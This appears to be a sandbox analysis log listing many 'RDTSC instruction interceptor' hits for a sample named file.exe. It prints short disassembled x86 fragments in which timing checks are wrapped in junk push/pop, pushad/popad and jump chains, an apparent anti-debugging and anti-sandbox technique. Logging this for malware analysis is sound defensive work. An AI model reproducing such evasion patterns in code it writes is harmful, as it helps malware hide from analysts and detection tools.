Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C02F3 second address: 49C0368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F8A9FE9E1F1h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F8A2D3CFEE3h 0x00000016 xor eax, 01459F1Eh 0x0000001c jmp 00007F8A2D3CFEE9h 0x00000021 popfd 0x00000022 popad 0x00000023 mov edx, dword ptr [esi+44h] 0x00000026 jmp 00007F8A2D3CFEDEh 0x0000002b or edx, dword ptr [ebp+0Ch] 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push ebx 0x00000032 pop esi 0x00000033 push ebx 0x00000034 pop ecx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0368 second address: 49C037D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2CE89CA1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C037D second address: 49C039E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8A2D3CFEDFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C039E second address: 49C03BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B07E3 second address: 49B07E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B07E9 second address: 49B07ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B07ED second address: 49B07F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B07F1 second address: 49B0871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8A2CE89CA2h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F8A2CE89CA0h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 call 00007F8A2CE89C9Eh 0x0000001c push esi 0x0000001d pop edx 0x0000001e pop ecx 0x0000001f push ebx 0x00000020 mov eax, 4236AD59h 0x00000025 pop eax 0x00000026 popad 0x00000027 and esp, FFFFFFF8h 0x0000002a jmp 00007F8A2CE89CA5h 0x0000002f xchg eax, ebx 0x00000030 jmp 00007F8A2CE89C9Eh 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F8A2CE89C9Eh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0871 second address: 49B0876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0876 second address: 49B08CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F8A2CE89CA9h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 jmp 00007F8A2CE89C9Ch 0x00000016 push eax 0x00000017 mov ch, bh 0x00000019 pop esi 0x0000001a popad 0x0000001b push eax 0x0000001c jmp 00007F8A2CE89CA8h 0x00000021 xchg eax, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B08CC second address: 49B08D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B08D2 second address: 49B08E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2CE89C9Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B08E1 second address: 49B0924 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov bx, ax 0x00000012 mov eax, 417DC53Fh 0x00000017 popad 0x00000018 sub ebx, ebx 0x0000001a jmp 00007F8A2D3CFEDBh 0x0000001f test esi, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov di, 0CE6h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0924 second address: 49B0970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F8A9F95F6F6h 0x00000010 pushad 0x00000011 mov bl, 4Bh 0x00000013 pushfd 0x00000014 jmp 00007F8A2CE89CA6h 0x00000019 adc si, B3B8h 0x0000001e jmp 00007F8A2CE89C9Bh 0x00000023 popfd 0x00000024 popad 0x00000025 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov esi, edi 0x00000031 movsx edi, ax 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0970 second address: 49B0976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0976 second address: 49B097A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B097A second address: 49B09CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a pushad 0x0000000b push edx 0x0000000c movzx esi, dx 0x0000000f pop edx 0x00000010 pushfd 0x00000011 jmp 00007F8A2D3CFEE2h 0x00000016 or ax, D878h 0x0000001b jmp 00007F8A2D3CFEDBh 0x00000020 popfd 0x00000021 popad 0x00000022 je 00007F8A9FEA58CAh 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F8A2D3CFEE5h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B09CC second address: 49B0A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, dl 0x00000005 mov edx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test byte ptr [77516968h], 00000002h 0x00000011 jmp 00007F8A2CE89CA2h 0x00000016 jne 00007F8A9F95F65Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F8A2CE89CA7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0A0E second address: 49B0A37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, bx 0x00000012 mov ecx, ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0A37 second address: 49B0ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A2CE89C9Eh 0x00000009 xor esi, 469D3928h 0x0000000f jmp 00007F8A2CE89C9Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F8A2CE89CA8h 0x0000001b xor cl, FFFFFF88h 0x0000001e jmp 00007F8A2CE89C9Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebx 0x00000028 jmp 00007F8A2CE89CA6h 0x0000002d push eax 0x0000002e jmp 00007F8A2CE89C9Bh 0x00000033 xchg eax, ebx 0x00000034 jmp 00007F8A2CE89CA6h 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F8A2CE89CA7h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0ADA second address: 49B0AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2D3CFEE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0AF2 second address: 49B0AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0AF6 second address: 49B0B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, esi 0x0000000c mov edx, ecx 0x0000000e popad 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0B0C second address: 49B0B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0B10 second address: 49B0B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0B14 second address: 49B0B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0B1A second address: 49B0B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0B20 second address: 49B0B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0B24 second address: 49B0B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+14h] 0x0000000e jmp 00007F8A2D3CFEE0h 0x00000013 push dword ptr [ebp+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F8A2D3CFEDDh 0x0000001f sbb cx, 6986h 0x00000024 jmp 00007F8A2D3CFEE1h 0x00000029 popfd 0x0000002a call 00007F8A2D3CFEE0h 0x0000002f pop ecx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0BC1 second address: 49B0BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0BC7 second address: 49B0BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0D5D second address: 49C0D62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0D62 second address: 49C0D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0D68 second address: 49C0D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov cx, 3EABh 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0A45 second address: 49C0AE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A2D3CFEDFh 0x00000009 adc si, EBBEh 0x0000000e jmp 00007F8A2D3CFEE9h 0x00000013 popfd 0x00000014 call 00007F8A2D3CFEE0h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push edx 0x0000001e jmp 00007F8A2D3CFEDEh 0x00000023 mov dword ptr [esp], ebp 0x00000026 pushad 0x00000027 mov esi, 3D032D3Dh 0x0000002c pushad 0x0000002d mov ch, D7h 0x0000002f pushfd 0x00000030 jmp 00007F8A2D3CFEE5h 0x00000035 adc esi, 071DD206h 0x0000003b jmp 00007F8A2D3CFEE1h 0x00000040 popfd 0x00000041 popad 0x00000042 popad 0x00000043 mov ebp, esp 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F8A2D3CFEDDh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0AE7 second address: 49C0AEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0AEC second address: 49C0B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8A2D3CFEE2h 0x00000013 sub cl, 00000008h 0x00000016 jmp 00007F8A2D3CFEDBh 0x0000001b popfd 0x0000001c mov eax, 7325B57Fh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4001B second address: 4A4004E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8A2CE89C9Fh 0x00000008 pop ecx 0x00000009 mov cx, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8A2CE89CA7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4004E second address: 4A40054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40054 second address: 4A40058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30471 second address: 4A3048E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3048E second address: 4A304AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 mov edx, ecx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A302BC second address: 4A302C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A302C0 second address: 4A302C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A302C4 second address: 4A302CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A302CA second address: 4A302D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A302D0 second address: 4A3030C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F8A2D3CFEDCh 0x00000015 sbb ax, A8E8h 0x0000001a jmp 00007F8A2D3CFEDBh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3030C second address: 4A30322 instructions: 0x00000000 rdtsc 0x00000002 mov ch, 78h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8A2CE89C9Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30322 second address: 4A30334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2D3CFEDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30334 second address: 4A30338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D011D second address: 49D016F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 54B7D071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c call 00007F8A2D3CFEE8h 0x00000011 mov ecx, 40625B51h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007F8A2D3CFEDDh 0x0000001f xor eax, 4AAF8266h 0x00000025 jmp 00007F8A2D3CFEE1h 0x0000002a popfd 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A306DE second address: 4A306F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A306F8 second address: 4A3070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2D3CFEDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3070A second address: 4A30744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov eax, 1D18BE6Bh 0x00000014 mov edx, eax 0x00000016 popad 0x00000017 push B3265065h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F8A2CE89CA6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A307BD second address: 4A307CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2D3CFEDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A307CD second address: 4A307D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A307D1 second address: 4A307F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8A2D3CFEE9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A307F9 second address: 4A3080E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3080E second address: 4A30850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, bl 0x0000000f pushfd 0x00000010 jmp 00007F8A2D3CFEE4h 0x00000015 xor cx, 3198h 0x0000001a jmp 00007F8A2D3CFEDBh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0313 second address: 49E0322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2CE89C9Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0322 second address: 49E0397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8A2D3CFEE7h 0x00000013 sbb ecx, 5A9069CEh 0x00000019 jmp 00007F8A2D3CFEE9h 0x0000001e popfd 0x0000001f pushad 0x00000020 mov al, 6Bh 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F8A2D3CFEE2h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0510 second address: 49E0515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0515 second address: 49E0534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8A2D3CFEE3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0534 second address: 49E0538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0538 second address: 49E053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E053E second address: 49E0565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8A2CE89C9Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0565 second address: 49E0574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0574 second address: 49E058C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2CE89CA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E058C second address: 49E0668 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 1Ch 0x0000000b pushad 0x0000000c call 00007F8A2D3CFEDDh 0x00000011 jmp 00007F8A2D3CFEE0h 0x00000016 pop eax 0x00000017 mov eax, ebx 0x00000019 popad 0x0000001a push esp 0x0000001b pushad 0x0000001c mov esi, 1D1FB7FFh 0x00000021 pushfd 0x00000022 jmp 00007F8A2D3CFEE4h 0x00000027 add eax, 487EADE8h 0x0000002d jmp 00007F8A2D3CFEDBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov dword ptr [esp], ebx 0x00000037 pushad 0x00000038 mov ax, FCFBh 0x0000003c mov edx, ecx 0x0000003e popad 0x0000003f xchg eax, esi 0x00000040 jmp 00007F8A2D3CFEDAh 0x00000045 push eax 0x00000046 jmp 00007F8A2D3CFEDBh 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007F8A2D3CFEE4h 0x00000053 and ax, 82A8h 0x00000058 jmp 00007F8A2D3CFEDBh 0x0000005d popfd 0x0000005e call 00007F8A2D3CFEE8h 0x00000063 pop esi 0x00000064 popad 0x00000065 push esi 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F8A2D3CFEE9h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0668 second address: 49E06FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F8A2CE89CA3h 0x0000000b add si, 12AEh 0x00000010 jmp 00007F8A2CE89CA9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], edi 0x0000001c pushad 0x0000001d push esi 0x0000001e pushfd 0x0000001f jmp 00007F8A2CE89CA3h 0x00000024 adc ecx, 29EF08BEh 0x0000002a jmp 00007F8A2CE89CA9h 0x0000002f popfd 0x00000030 pop eax 0x00000031 popad 0x00000032 mov eax, dword ptr [7751B370h] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F8A2CE89CA6h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E06FB second address: 49E0700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0700 second address: 49E0777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F8A2CE89CA7h 0x0000000a or cl, 0000002Eh 0x0000000d jmp 00007F8A2CE89CA9h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xor dword ptr [ebp-08h], eax 0x00000019 pushad 0x0000001a mov ecx, 794B2353h 0x0000001f pushfd 0x00000020 jmp 00007F8A2CE89CA8h 0x00000025 adc ax, 78D8h 0x0000002a jmp 00007F8A2CE89C9Bh 0x0000002f popfd 0x00000030 popad 0x00000031 xor eax, ebp 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 mov eax, ebx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0777 second address: 49E077B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
